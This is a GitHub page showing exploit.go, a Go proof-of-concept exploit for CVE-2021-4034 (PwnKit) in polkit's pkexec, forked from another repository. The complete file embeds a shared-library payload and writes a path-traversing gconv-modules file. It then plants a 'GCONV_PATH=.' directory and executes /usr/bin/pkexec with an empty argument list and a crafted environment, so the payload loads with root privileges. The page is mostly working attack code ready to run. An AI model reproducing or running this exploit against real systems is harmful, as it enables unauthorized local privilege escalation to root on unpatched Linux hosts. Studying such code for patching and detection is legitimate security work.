forked from dzonerzy/poc-cve-2021-4034
-
Notifications
You must be signed in to change notification settings - Fork 5
/
exploit.go
58 lines (51 loc) · 1.36 KB
/
exploit.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
package main
import (
_ "embed"
"fmt"
"io/ioutil"
"log"
"os"
"path/filepath"
"strings"
"syscall"
)
//go:embed payload.so
var payload []byte
const (
fake_charset = "payload"
gconv_dir = "gconv"
)
var (
gconv_content = "module PAYLOAD// INTERNAL ../../../../../../../..${REPLACE} 2\nmodule INTERNAL PAYLOAD// ../../../../../../../..${REPLACE} 2"
)
func wirte_gconv_module() (err error) {
if err := os.Mkdir(gconv_dir, 0o0755); err != nil {
return err
}
directory, err := os.Getwd()
if err != nil {
return err
}
ioutil.WriteFile(filepath.Join(directory, "payload.so"), payload, 0o0755)
replace := filepath.Join(directory, "payload.so")
content := strings.Replace(gconv_content, "${REPLACE}", replace, -1)
if err := ioutil.WriteFile(fmt.Sprintf("%s/gconv-modules", gconv_dir), []byte(content), 0o0755); err != nil {
log.Fatal(err)
}
return nil
}
func main() {
target := "/usr/bin/pkexec"
if err := wirte_gconv_module(); err != nil {
log.Fatal(err)
}
if err := os.Mkdir("GCONV_PATH=.", 0o0755); err != nil {
log.Fatal(err)
}
if err := ioutil.WriteFile(fmt.Sprintf("GCONV_PATH=./%s", gconv_dir), []byte("\x00"), 0o0755); err != nil {
log.Fatal(err)
}
if err := syscall.Exec(target, nil, []string{gconv_dir, "PATH=GCONV_PATH=.", "SHELL=/fake/shell", fmt.Sprintf("CHARSET=%s", fake_charset)}); err != nil {
log.Fatal(err)
}
}